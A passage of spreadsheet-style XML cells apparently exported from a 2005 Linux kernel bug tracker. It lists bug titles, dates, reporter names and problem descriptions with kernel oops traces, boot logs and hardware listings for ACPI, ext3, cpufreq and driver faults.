    <t>2.6.12-rc1-mm1 - -rc5-mm1, 2.6.13-rc2-mm1 and above</t>
  </si>
  <si>
    <t>2005-05-26 08:52 UTC</t>
  </si>
  <si>
    <t>2005-08-31 06:16 UTC</t>
  </si>
  <si>
    <t>1093 4793 4846 4911 5100</t>
  </si>
  <si>
    <t>Distribution: SUSE 9.[23] AMD64 Hardware Environment: Asus L5D Software Environment: SUSE 9.[23] AMD64 Problem Description: ACPI battery monitor is very slow to respond and it does not return any numbers, eg rafael@albercik:/proc/acpi/battery/BAT0&gt; time cat state present:</t>
  </si>
  <si>
    <t>Broken link in CONFIG_FB_RADEON and CONFIG_FB_RADEON_OLD</t>
  </si>
  <si>
    <t>2005-05-28 01:52 UTC</t>
  </si>
  <si>
    <t>2005-10-31 00:11 UTC</t>
  </si>
  <si>
    <t>[2.6.12-rc4-mm2] oops at log_do_checkpoint+0xa1/0x230</t>
  </si>
  <si>
    <t>2005-05-29 22:21 UTC</t>
  </si>
  <si>
    <t>Maneesh Soni</t>
  </si>
  <si>
    <t>2005-06-15 07:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: Following is the lkml post from Jesse for this oops on 2.6.12-rc4. Later on the same was tried on 2.6.12-rc4-mm2 with kdump enabled Under heavy filesystem load (I have a stress test program that creates many directories and files and constantly creates, reads, and deletes them) , I get the following oops reliably under both 2.6.11.8 and 2.6.12-rc4. I was also constantly creating/reading/deleting files over NFS (server was 2.6.11.8) at the same time. 2.4.30 runs fine for long periods of time with the same tests. 2.6.12-rc4 and 2.6.11.8 usually fail within an hour. Running a Dell PE2850 (dual 2.8 xeon), Debian woody, ext3, SMP, HT. After the oops, I see kjournald using 99.9% CPU. May 9 15:10:31 markov kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 May 9 15:10:31 markov kernel: printing eip: May 9 15:10:31 markov kernel: c01c019a May 9 15:10:31 markov kernel: *pde = 00000000 May 9 15:10:31 markov kernel: Oops: 0002 [#1] May 9 15:10:31 markov kernel: PREEMPT SMP May 9 15:10:31 markov kernel: Modules linked in: e1000 May 9 15:10:31 markov kernel: CPU: 3 May 9 15:10:31 markov kernel: EIP: 0060:[log_do_checkpoint+142/472] Not tainted VLI May 9 15:10:31 markov kernel: EFLAGS: 00010202 (2.6.12-rc4) May 9 15:10:31 markov kernel: EIP is at log_do_checkpoint+0x8e/0x1d8 May 9 15:10:31 markov kernel: eax: 00000000 ebx: e90605f8 ecx: c2305080 edx: d23ce000 May 9 15:10:31 markov kernel: esi: 00000000 edi: ee3eade4 ebp: d23ce000 esp: d23cfbe8 May 9 15:10:31 markov kernel: ds: 007b es: 007b ss: 0068 May 9 15:10:31 markov kernel: Process pdflush (pid: 1656, threadinfo=d23ce000 task=df323a60) May 9 15:10:31 markov kernel: Stack: c2174814 c2174800 00000fed c2174800 c21748e4 0003af8f e3f106fc f77ce780 May 9 15:10:31 markov kernel: 00000000 00000004 e1d0983c e1d095cc e1d092fc e191459c e19140bc e164038c May 9 15:10:31 markov kernel: e1640ddc e191489c e1640b6c e164068c e126a92c e126a44c e126a1ac e0e9368c May 9 15:10:31 markov kernel: Call Trace: May 9 15:10:31 markov kernel: [__log_wait_for_space+124/164] __log_wait_for_space+0x7c/0xa4 May 9 15:10:31 markov kernel: [start_this_handle+732/812] start_this_handle+0x2dc/0x32c May 9 15:10:31 markov kernel: [autoremove_wake_function+0/64] autoremove_wake_function+0x0/0x40 May 9 15:10:31 markov kernel: [autoremove_wake_function+0/64] autoremove_wake_function+0x0/0x40 May 9 15:10:31 markov kernel: [journal_start+139/184] journal_start +0x8b/0xb8 May 9 15:10:32 markov kernel: [gcc2_compiled.+44/76] ext3_journal_start_sb+0x2c/0x4c May 9 15:10:32 markov kernel: [ext3_ordered_writepage+106/320] ext3_ordered_writepage+0x6a/0x140 May 9 15:10:32 markov kernel: [mpage_writepages+437/800] mpage_writepages+0x1b5/0x320 May 9 15:10:32 markov kernel: [ext3_ordered_writepage+0/320] ext3_ordered_writepage+0x0/0x140 May 9 15:10:32 markov kernel: [do_writepages+53/60] do_writepages +0x35/0x3c May 9 15:10:32 markov kernel: [__sync_single_inode+101/460] __sync_single_inode+0x65/0x1cc May 9 15:10:32 markov kernel: [__writeback_single_inode+279/292] __writeback_single_inode+0x117/0x124 May 9 15:10:32 markov kernel: [iput+67/108] iput+0x43/0x6c May 9 15:10:32 markov kernel: [sync_sb_inodes+505/712] sync_sb_inodes +0x1f9/0x2c8 May 9 15:10:32 markov kernel: [writeback_inodes+127/216] writeback_inodes+0x7f/0xd8 May 9 15:10:32 markov kernel: [background_writeout+71/156] background_writeout+0x47/0x9c May 9 15:10:32 markov kernel: [gcc2_compiled.+267/424] __pdflush +0x10b/0x1a8 May 9 15:10:32 markov kernel: [pdflush+0/40] pdflush+0x0/0x28 May 9 15:10:32 markov kernel: [pdflush+30/40] pdflush+0x1e/0x28 May 9 15:10:32 markov kernel: [background_writeout+0/156] background_writeout+0x0/0x9c May 9 15:10:32 markov kernel: [kthread+125/172] kthread+0x7d/0xac May 9 15:10:32 markov kernel: [kthread+0/172] kthread+0x0/0xac May 9 15:10:32 markov kernel: [kernel_thread_helper+5/12] kernel_thread_helper+0x5/0xc May 9 15:10:32 markov kernel: Code: 24 24 00 00 00 00 8b 40 40 89 44 24 1c 8b 50 04 89 54 24 14 8b 58 28 89 df 8b 43 30 89 44 24 18 90 89 fb 8b 7b 2c 8b 33 ff 45 14 &lt;f0&gt; 0f ba 2e 13 19 c0 85 c0 74 30 ff 4d 14 8b 45 08 a8 08 74 05 May 9 15:10:32 markov kernel: &lt;6&gt;note: pdflush[1656] exited with preempt_count 2 Kernel config is attached. Thanks, Jesse</t>
  </si>
  <si>
    <t>fault to change cpu freq.</t>
  </si>
  <si>
    <t>2005-05-29 23:46 UTC</t>
  </si>
  <si>
    <t>2005-08-21 00:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: notebook samsung nv5000 , Intel SpeedStep on 440BX/ZX/MX Software Environment: kernel &amp; cpudynd Problem Description: speed step do not working on my laptop wile bios bug, but i still need it and i use kernel options speedstep-smi.smi-cmd=0x82 speedstep-lib.relaxed_check=1, and it's working but not allways. I get thise message instade : cpufreq: change failed with new_state 0 and result 3</t>
  </si>
  <si>
    <t>kernel panic on boot with kernel 2.6.11.11 on OpenPower system</t>
  </si>
  <si>
    <t>2.6.11.11</t>
  </si>
  <si>
    <t>2005-05-30 22:14 UTC</t>
  </si>
  <si>
    <t>2005-06-19 19:46 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.11.11 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 Problem Description: Build the kernel 2.6.11.11 successful on RHEL 4, but failed to boot from the kernel. Steps to reproduce: 1.download linux-2.6.11.11.tar.gz from www.kernel.org 2.copy /boot/config-2.6.9-5.EL to /usr/src/linux-2.6.11/.config 4.make menuconfig; make vmlinux modules,modules_install 5.mkinitrd.ppc64 2.6.11.11 ( a sciprts to make initrd ) 6.copy vmlinux.strip to /boo/vmlinux-2.6.11.11 and copy initrd-2.6.11.11 to /boot 7.edit the /etc/yaboot.conf 8.restart the machine Additional information: The following message comes from booting the kernel 2.6.11.11 Please wait, loading kernel... Elf64 kernel loaded... Loading ramdisk... ramdisk loaded at 02300000, size: 1159 Kbytes OF stdout device is: /vdevice/vty@30000000 Hypertas detected, assuming LPAR ! command line: ro console=hvc0 xmon=on rhgb quiet root=LABEL=/ memory layout at init: alloc_bottom : 0000000002422000 alloc_top : 0000000008000000 alloc_top_hi : 0000000088000000 rmo_top : 0000000008000000 ram_top : 0000000088000000 Looking for displays instantiating rtas at 0x00000000077d7000... done 0000000000000000 : boot cpu 0000000000000000 copying OF device tree ... Building dt strings... Building dt structure... Device tree strings 0x0000000002723000 -&gt; 0x0000000002724218 Device tree struct 0x0000000002725000 -&gt; 0x000000000272f000 Calling quiesce ... returning from prom_init Found initrd at 0xc000000002300000:0xc000000002421c00 firmware_features = 0x1ffd5f cpu 0x0: Vector: 0 at [c0000000003c3aa0] pc: c000000087fff1e8 lr: c000000087fff1e8 sp: c0000000003c3a30 msr: 8000000000001032 current = 0xc000000000436120 paca = 0xc000000000411000 pid = 0, comm = swapper enter ? for help 0:mon&gt; e cpu 0x0: Vector: 0 at [c0000000003c3aa0] pc: c000000087fff1e8 lr: c000000087fff1e8 sp: c0000000003c3a30 msr: 8000000000001032 current = 0xc000000000436120 paca = 0xc000000000411000 pid = 0, comm = swapper</t>
  </si>
  <si>
    <t>kernel BUG at fs/mpage.c:465!</t>
  </si>
  <si>
    <t>2005-06-02 12:08 UTC</t>
  </si>
  <si>
    <t>David Gardner</t>
  </si>
  <si>
    <t>2005-10-11 11:54 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES 9 w/kernel.org Linux version 2.6.12-rc4-mm2 Hardware Environment: 8x: vendor_id : GenuineIntel cpu family : 15 model : 1 model name : Intel(R) Xeon(TM) CPU 1.60GHz stepping : 1 cpu MHz : 1598.164 cache size : 256 KB Software Environment: Linux version 2.6.12-rc4-mm2 Problem Description: kernel BUG at fs/mpage.c:465! invalid operand: 0000 [#1] SMP Modules linked in: usbserial lp edd joydev sg st sr_mod ide_cd cdrom nvram uhci_hcd via686a i2c_sensor i2c_core parport_pc parport ibmasm speedstep_lib processor evdev ipv6 usbcore nls_utf8 jfs reiserfs dm_mod ext3 jbd ips qla2200 qla2xxx scsi_transport_fc aic7xxx scsi_transport_spi sd_mod scsi_mod CPU: 0 EIP: 0060:[&lt;c018e804&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.12-rc4-mm2) EIP is at __mpage_writepage+0x634/0x690 eax: 40000065 ebx: f0bb0c48 ecx: 00000000 edx: c12e2680 esi: c12e2680 edi: 00000000 ebp: 00000001 esp: d7ba1cdc ds: 007b es: 007b ss: 0068 Process pdflush (pid: 15821, threadinfo=d7ba0000 task=e5257030) Stack: d7ba1d30 00000001 c54150d4 00000000 09170bb4 00000000 00000000 00000000 00000000 00000000 00000000 00000001 00009170 00000000 00000001 0000000c f0bb0c48 f0bb0cf4 c01af950 c12e2680 00000000 00000010 c1554400 c12e2660 Call Trace: [&lt;c01af950&gt;] ext2_get_block+0x0/0x380 [&lt;c020e749&gt;] radix_tree_gang_lookup_tag+0x49/0x70 [&lt;c01479ee&gt;] find_get_pages_tag+0x7e/0x90 [&lt;c015215a&gt;] pagevec_lookup_tag+0x2a/0x40 [&lt;c018ec26&gt;] mpage_writepages+0x3c6/0x3f0 [&lt;c01afcd0&gt;] ext2_writepage+0x0/0x10 [&lt;c01af950&gt;] ext2_get_block+0x0/0x380 [&lt;c014db64&gt;] do_writepages+0x24/0x30 [&lt;c018cd14&gt;] __sync_single_inode+0x64/0x250 [&lt;c018cf85&gt;] __writeback_single_inode+0x85/0x180 [&lt;c0145c72&gt;] handle_IRQ_event+0x32/0x70 [&lt;c0145dc5&gt;] __do_IRQ+0x115/0x170 [&lt;c014e3b0&gt;] pdflush+0x0/0x20 [&lt;c01af2e5&gt;] ext2_discard_prealloc+0x25/0x90 [&lt;c018d25d&gt;] generic_sync_sb_inodes+0x1dd/0x2e0 [&lt;c014e3b0&gt;] pdflush+0x0/0x20 [&lt;c018d43f&gt;] writeback_inodes+0xbf/0xd0 [&lt;c014d876&gt;] background_writeout+0x86/0xc0 [&lt;c014e2ad&gt;] __pdflush+0xbd/0x1c0 [&lt;c014e3ca&gt;] pdflush+0x1a/0x20 [&lt;c014d7f0&gt;] background_writeout+0x0/0xc0 [&lt;c014e3b0&gt;] pdflush+0x0/0x20 [&lt;c0138965&gt;] kthread+0xe5/0x130 [&lt;c0138880&gt;] kthread+0x0/0x130 [&lt;c0102815&gt;] kernel_thread_helper+0x5/0x10 Code: 89 54 24 04 89 f2 e8 6c f2 ff ff 89 44 24 50 85 c0 0f 85 01 fe ff ff e9 45 ff ff ff 8b 4c 24 44 f0 0f ba 69 3c 15 e9 b7 fe ff ff &lt;0f&gt; 0b d1 01 7f 10 38 c0 e9 8c fb ff ff 0f 0b 9d 01 7f 10 38 c0 Steps to reproduce: Run hackbench + UNIXbench + bash-memory from the STP testsuite constantly in a loop.</t>
  </si>
  <si>
    <t>ide.txt says "hdx=scsi" instead of "hdx=ide-scsi"</t>
  </si>
  <si>
    <t>2.6.11-1.1366_FC4smp</t>
  </si>
  <si>
    <t>2005-06-02 20:54 UTC</t>
  </si>
  <si>
    <t>Jonathan Kamens</t>
  </si>
  <si>
    <t>2006-02-15 05:36 UTC</t>
  </si>
  <si>
    <t>The documentation ide.txt says to use "hdx=scsi" to activate IDE SCSI emulation on hdx. But I tried that and it didn't work, whereas "hdx=ide-scsi" works just fine. I think the documentation needs to be fixed.</t>
  </si>
  <si>
    <t>Boot hang due to BIOS reporting phantom 2nd IOAPIC - Acer Travelmate 3002, 915gm Chipset</t>
  </si>
  <si>
    <t>2.6.12-rc5 - 2.6.16</t>
  </si>
  <si>
    <t>2005-06-03 04:28 UTC</t>
  </si>
  <si>
    <t>Tilo Lutz</t>
  </si>
  <si>
    <t>2006-03-25 16:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse Linux 9.3 Hardware Environment: Acer Travelmate 3002, 915gm Chipset Software Environment: Suse Linux 9.3 Problem Description: IRQ assignment don't work correct. Many connected devices don't work although they are regocnized Steps to reproduce: Just start the kernel kernel-parameter: noacpi Without the kernel won't boot up. I stored all infos at: http://home.wms-hn.de/~tilo/kernel because this mail can only be 65000 chars long. I had to modify because the original has some errors: Jun 1 20:10:28 Notebook kernel: ACPI-0352: *** Error: Looking up [Z00B] in namespace, AE_NOT_FOUND Jun 1 20:10:28 Notebook kernel: search_node df384400 start_node df384400 return_node 00000000 Jun 1 20:10:28 Notebook kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.BAT1._BST] (Node df384300), AE_NOT_FOUND Jun 1 20:10:28 Notebook kernel: ACPI-0352: *** Error: Looking up [Z00B] in namespace, AE_NOT_FOUND Jun 1 20:10:28 Notebook kernel: search_node df384400 start_node df384400 return_node 00000000 Jun 1 20:10:28 Notebook kernel: ACPI-1138: *** Error: Method execution failed [\_SB_.BAT1._BST] (Node df384300), AE_NOT_FOUND I didn't know the programming language but I was able to add the required patches because I take a look at other patched acer dsdt table. I have attached the original dsdt and the patch. lspci -vv: http://home.wms-hn.de/~tilo/kernel/lspci /proc/interrupts: CPU0 0: 22594 XT-PIC timer 1: 294 XT-PIC i8042 2: 0 XT-PIC cascade 8: 2 XT-PIC rtc 9: 402 XT-PIC acpi 11: 0 XT-PIC ohci1394 14: 6358 XT-PIC ide0 NMI: 0 LOC: 13094 ERR: 0 MIS: 0 dmesg: http://home.wms-hn.de/~tilo/kernel/dmesg .config: http://home.wms-hn.de/~tilo/kernel/config original_dsdt: http://home.wms-hn.de/~tilo/kernel/DSDT-Acer-Travelmate-3000-orig Patch for dsdt: 211a212 &gt; External (CFGD) 573c574 &lt; If (LEqual (And (PDC0, 0x0A), 0x0A)) --- &gt; If (LEqual (And (\_SB.PCI0.RP01.PDC0, 0x0A), 0x0A)) 578c579 &lt; If (LEqual (And (PDC1, 0x0A), 0x0A)) --- &gt; If (LEqual (And (\_SB.PCI0.RP01.PDC1, 0x0A), 0x0A)) 1879c1880 &lt; , 2, --- &gt; PDC0, 2, 2149a2151 &gt; Return (0x00) 3676c3678 &lt; \_SB.BAT1.Z007 () --- &gt; \_SB.BAT1.Z00B () 5910c5912 &lt; Method (Z007, 0, NotSerialized) --- &gt; Method (Z00B, 0, NotSerialized) output of acpidmt: http://home.wms-hn.de/~tilo/kernel/acpidmt</t>
  </si>
  <si>
    <t>memory leak somewhere in toshiba_acpi</t>
  </si>
  <si>
    <t>2005-06-04 04:56 UTC</t>
  </si>
  <si>
    <t>Michal Cihar</t>
  </si>
  <si>
    <t>John Belmonte</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Toshiba Stalellite Pro M30 Software Environment: Problem Description: While reading entries from /proc/acpi/toshiba, kernel still allocates memory and doesn't free it until kernel kills everything because of no free memory. Steps to reproduce: This script shows allocations: grep size-64\ /proc/slabinfo sleep 10 grep size-64\ /proc/slabinfo for x in `seq 1 100` ; do cat /proc/acpi/toshiba/fan &gt; /dev/null done grep size-64\ /proc/slabinfo sleep 10 grep size-64\ /proc/slabinfo Output looks like: size-64 201360 201361 64 61 1 : tunables 120 60 0 : slabdata 3301 3301 0 size-64 201360 201361 64 61 1 : tunables 120 60 0 : slabdata 3301 3301 0 size-64 201604 201605 64 61 1 : tunables 120 60 0 : slabdata 3305 3305 0 size-64 201604 201605 64 61 1 : tunables 120 60 0 : slabdata 3305 3305 0 It has been happening also in several older kernel versions.</t>
  </si>
  <si>
    <t>SAA7134 audio demodulator do not switch to mono, when no stereo channels in NICAM mode found</t>
  </si>
  <si>
    <t>2005-06-04 05:08 UTC</t>
  </si>
  <si>
    <t>Vitaly Mayatskih</t>
  </si>
  <si>
    <t>2005-12-08 09:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: AverTV Studio 307 Software Environment: Problem Description: SAA7134 audio demodulator do not switch to mono, when no stereo channels in NICAM mode found. NICAM stereo mode (SECAM-L NICAM) automatically detected by the driver. Steps to reproduce: Switch to tv channel without stereo channels available.</t>
  </si>
  <si>
    <t>Newisys AMD box hasn't booted since 2.6.12-rc2</t>
  </si>
  <si>
    <t>2005-06-04 07:34 UTC</t>
  </si>
  <si>
    <t>2005-06-17 06:47 UTC</t>
  </si>
  <si>
    <t>See http://ftp.kernel.org/pub/linux/kernel/people/mbligh/abat/regression_matrix.html for full details, boot logs, etc. In mm it started between rc2-mm1 and -mm2 The failure seems to vary a bit, but some of them look like this: ^M^@Fusion MPT base driver 3.01.20 ^M^@Copyright (c) 1999-2004 LSI Logic Corporation ^M^@ACPI: PCI Interrupt 0000:02:04.0[A] -&gt; GSI 27 (level, low) -&gt; IRQ 27 ^M^@mptbase: Initiating ioc0 bringup ^M^@mptbase: ioc0: ERROR - Wait IOC_READY state timeout(15)! ^M^@mptbase: ioc0: ERROR - Enable Diagnostic mode FAILED! (00h) ^M^@mptbase: ioc0 NOT READY WARNING! ^M^@mptbase: WARNING - ioc0 did not initialize properly! (-1) ^M^@mptbase: probe of 0000:02:04.0 failed with error -1 ^M^@Fusion MPT SCSI Host driver 3.01.20 Backing out to the old fusion code from -rc2 doesn't help. ^M^@tg3.c:v3.27 (May 5, 2005) ^M^@ACPI: PCI Interrupt 0000:02:02.0[A] -&gt; GSI 25 (level, low) -&gt; IRQ 25 ^M^@tg3: (0000:02:02.0) phy probe failed, err -16 ^M^@BUG: soft lockup detected on CPU#3! ^M ^M^@Modules linked in: ^M^@Pid: 42, comm: swapper Not tainted 2.6.12-rc4-mm2-autokern1 ^M^@RIP: 0010:[&lt;ffffffff8037c42b&gt;] &lt;ffffffff8037c42b&gt;{lock_kernel+27} ^M^@RSP: 0000:ffff8101ff401ec0 EFLAGS: 00000286 ^M^@RAX: ffff8101ffb37070 RBX: 0000000000000000 RCX: 0000000000000010 ^M^@RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 ^M^@RBP: 0000000000000000 R08: 0000000000000000 R09: ffff8101ffbad940 ^M^@R10: 0000000000000001 R11: ffffffff80258560 R12: 0000000000000000 ^M^@R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 ^M^@FS: 0000000000000000(0000) GS:ffffffff804cf9c0(0000) knlGS:0000000000000000 ^M^@CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b ^M^@CR2: 0000000000000000 CR3: 0000000000101000 CR4: 00000000000006e0 ^M ^M^@Call Trace:&lt;ffffffff802af516&gt;{serio_thread+22} &lt;ffffffff8012bdc0&gt;{schedule_t ail+64} ^M^@ &lt;ffffffff8010e47b&gt;{child_rip+8} &lt;ffffffff80258560&gt;{vgacon_cursor+0} ^M^@ &lt;ffffffff802af500&gt;{serio_thread+0} &lt;ffffffff8010e473&gt;{child_rip+0} ^M^@ ^M^@tg3: Problem fetching invariants of chip, aborting. ^M^@tg3: probe of 0000:02:02.0 failed with error -16 ^M^@ACPI: PCI Interrupt 0000:02:03.0[A] -&gt; GSI 26 (level, low) -&gt; IRQ 26 ^M^@tg3: (0000:02:03.0) phy probe failed, err -16 ^M^@tg3: Problem fetching invariants of chip, aborting. ^M^@tg3: probe of 0000:02:03.0 failed with error -16 Is another failure mode. Interrupt routing, possibly?</t>
  </si>
  <si>
    <t>ACPI - System hang, loss of keyboard, Controller using wrong IRQ</t>
  </si>
  <si>
    <t>2005-06-04 13:52 UTC</t>
  </si>
  <si>
    <t>Parag Warudkar</t>
  </si>
  <si>
    <t>2006-04-20 05:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (doesn't affect the bug occurence) Hardware Environment: Athlon64, nvidia chipset (Compaq R3240US Laptop) Software Environment: Problem Description: With acpi enabled, there are 3 problems with the laptop - 1) The laptop hangs during boot for 2 minutes after which it recovers. Hang happens if a usb-storage device is attached to the laptop. I have traced the hang and it happens in pci_enable_device() for the controller to which the storage device is attached. (It is called by ohci_hcd module's probe() function) 2) If the laptop is *restarted* (without shutting off) from Windows XP into Linux, the keyboard doesn't get detected. 3) Sometimes without any setup change I get the following message in logs and no USB device works when this happens- [</t>
  </si>
  <si>
    <t>Asus A7N8X will not wake from S3</t>
  </si>
  <si>
    <t>linux-2.6.12-rc6-mm1</t>
  </si>
  <si>
    <t>2005-06-08 12:31 UTC</t>
  </si>
  <si>
    <t>Avuton Olrich</t>
  </si>
  <si>
    <t>2005-08-09 03:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Software Environment: ---------------------------------------------------------------------------- Problem Description: ---------------------------------------------------------------------------- Standby Works Fine. Sleep works fine, but it seems it won't awaken. I'd really like to give some useful information but I'm really not sure what I can give other than specs and program outputs. ---------------------------------------------------------------------------- Steps to reproduce: ---------------------------------------------------------------------------- When I goto S3 things seem fine. I press the power button on the computer I hear things winding up, I see both optical mouse lights come on, I hear the harddrives spin up, but network and both monitors never begin working again. I have tried without the nvidia binary loaded. I _am_ using sata on this machine. I have another nforce2 board which exhibits the same behaviour and is not using it's sata ports. This has _never_ worked for me, I'm just getting around to submitting a bug for it. Also, I have tried with a bare minimal kernel, just enough to get it booted and the same problem happens. ---------------------------------------------------------------------------- Kernel Config: ---------------------------------------------------------------------------- I will attach it. ---------------------------------------------------------------------------- lspci: ---------------------------------------------------------------------------- 0000:00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev c1) 0000:00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev c1) 0000:00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev c1) 0000:00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev c1) 0000:00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev c1) 0000:00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev c1) 0000:00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a4) 0000:00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) 0000:00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 0000:00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 0000:00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) 0000:00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) 0000:00:05.0 Multimedia audio controller: nVidia Corporation nForce MultiMedia audio [Via VT82C686B] (rev a2) 0000:00:06.0 Multimedia audio controller: nVidia Corporation nForce2 AC97 Audio Controler (MCP) (rev a1) 0000:00:08.0 PCI bridge: nVidia Corporation nForce2 External PCI Bridge (rev a3) 0000:00:09.0 IDE interface: nVidia Corporation nForce2 IDE (rev a2) 0000:00:1e.0 PCI bridge: nVidia Corporation nForce2 AGP (rev c1) 0000:01:04.0 Ethernet controller: Marvell Technology Group Ltd. Gigabit Ethernet Controller (rev 13) 0000:01:09.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 04) 0000:01:09.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 01) 0000:01:0a.0 Unknown mass storage controller: Promise Technology, Inc. 20269 (rev 02) 0000:01:0b.0 RAID bus controller: Silicon Image, Inc. (formerly CMD Technology Inc) SiI 3112 [SATALink/SATARaid] Serial ATA Controller (rev 02) 0000:03:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) ---------------------------------------------------------------------------- Dmesg (dmesg | grep -i acpi): ---------------------------------------------------------------------------- [4294670.341000] ACPI: Power Button (FF) [PWRF] [4294673.475000] ACPI: PCI Interrupt Link [LNK2] enabled at IRQ 5 [4294673.475000] ACPI: PCI Interrupt 0000:01:04.0[A] -&gt; Link [LNK2] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [4294673.475000] ACPI: PCI Interrupt 0000:01:04.0[A] -&gt; Link [LNK2] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [4294673.568000] ACPI: PCI Interrupt Link [LMAC] enabled at IRQ 5 [4294673.569000] ACPI: PCI Interrupt 0000:00:04.0[A] -&gt; Link [LMAC] -&gt; GSI 5 (level, low) -&gt; IRQ 5 [4294675.891000] ACPI: PCI Interrupt Link [LNK1] enabled at IRQ 10 [4294675.891000] ACPI: PCI Interrupt 0000:01:0a.0[A] -&gt; Link [LNK1] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [4294677.726000] ACPI: PCI Interrupt Link [LNK3] enabled at IRQ 11 [4294677.726000] ACPI: PCI Interrupt 0000:01:0b.0[A] -&gt; Link [LNK3] -&gt; GSI 11 (level, low) -&gt; IRQ 11 [4294678.485000] ACPI: PCI Interrupt Link [LUB2] enabled at IRQ 9 [4294678.485000] ACPI: PCI Interrupt 0000:00:02.2[C] -&gt; Link [LUB2] -&gt; GSI 9 (level, low) -&gt; IRQ 9 [4294678.513000] ACPI: PCI Interrupt Link [LUBA] enabled at IRQ 10 [4294678.513000] ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; Link [LUBA] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [4294678.574000] ACPI: PCI Interrupt Link [LUBB] enabled at IRQ 11 [4294678.574000] ACPI: PCI Interrupt 0000:00:02.1[B] -&gt; Link [LUBB] -&gt; GSI 11 (level, low) -&gt; IRQ 11 [4294679.164000] ACPI wakeup devices: [4294679.164000] ACPI: (supports S0 S1 S3 S4 S4bios S5) [4294691.150000] ACPI: PCI Interrupt Link [LNK4] enabled at IRQ 7 [4294691.150000] ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; Link [LNK4] -&gt; GSI 7 (level, low) -&gt; IRQ 7 [4294694.501000] ACPI: PCI Interrupt 0000:01:09.0[A] -&gt; Link [LNK2] -&gt; GSI 5 (level, low) -&gt; IRQ 5</t>
  </si>
  <si>
    <t>KBUILD_CHECK in $(srcdir)/Makefile</t>
  </si>
  <si>
    <t>2005-06-09 19:49 UTC</t>
  </si>
  <si>
    <t>Ken Morgan</t>
  </si>
  <si>
    <t>2005-09-10 06:18 UTC</t>
  </si>
  <si>
    <t>Distribution: n/a Hardware Environment: n/a Software Environment: n/a Problem Description: Line 113 in Makefile. If O=dir is used to relocate output, the C=1 option does not get passed to the second invocation of make in the output directory because KBUILD_CHECK=$(KBUILD_CHECK) is passed to the second invocation. KBUILD_CHECKSRC=$(KBUILD_CHECKSRC) should be passed instead. Steps to reproduce: Did not test, but it seems clear from the makefile that this behavior would occur.</t>
  </si>
  <si>
    <t>Typo in $(srcdir)/Makefile comment</t>
  </si>
  <si>
    <t>2005-06-09 19:56 UTC</t>
  </si>
  <si>
    <t>2005-06-26 01:45 UTC</t>
  </si>
  <si>
    <t>Distribution: n/a Hardware Environment: n/a Software Environment: n/a Problem Description: Line 283 of Makefile. "gcc-option" should be "cc-option". Steps to reproduce: n/a</t>
  </si>
  <si>
    <t>KBUILD_VERBOSE exported twice in $(srcdir)/Makefile</t>
  </si>
  <si>
    <t>2005-06-09 20:40 UTC</t>
  </si>
  <si>
    <t>2005-09-10 06:17 UTC</t>
  </si>
  <si>
    <t>Distribution: n/a Hardware Environment: n/a Software Environment: n/a Problem Description: Line 276 of Makefile. KBUILD_VERBOSE was already exported. Steps to reproduce: n/a</t>
  </si>
  <si>
    <t>Oops while getting off files off of an iPod with hfsplus filesystem (USB connection)</t>
  </si>
  <si>
    <t>HFS/HFSPLUS</t>
  </si>
  <si>
    <t>2005-06-10 01:49 UTC</t>
  </si>
  <si>
    <t>2005-11-18 12:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian 3.1 Hardware Environment: Compaq Evo N410c notebook, OHCI + EHCI Software Environment: Problem Description: While copying files off of an iPod with hfsplus file system, gtkpod froze, and I found the following oops in my logs. It shows SCSI errors first, and the real problem may well be lying in the USB storage device. However, SCSI and USB code doesn't seem to appear in the backtrace. Jun 7 17:51:17 localhost kernel: SCSI error : &lt;3 0 0 0&gt; return code = 0x50000 Jun 7 17:51:17 localhost kernel: end_request: I/O error, dev sda, sector 306039 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306039 Jun 7 17:51:17 localhost kernel: scsi3 (0:0): rejecting I/O to offline device Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306040 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306041 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306042 Jun 7 17:51:17 localhost kernel: Buffer I/O error on device sda, logical block 306043 Jun 7 17:51:17 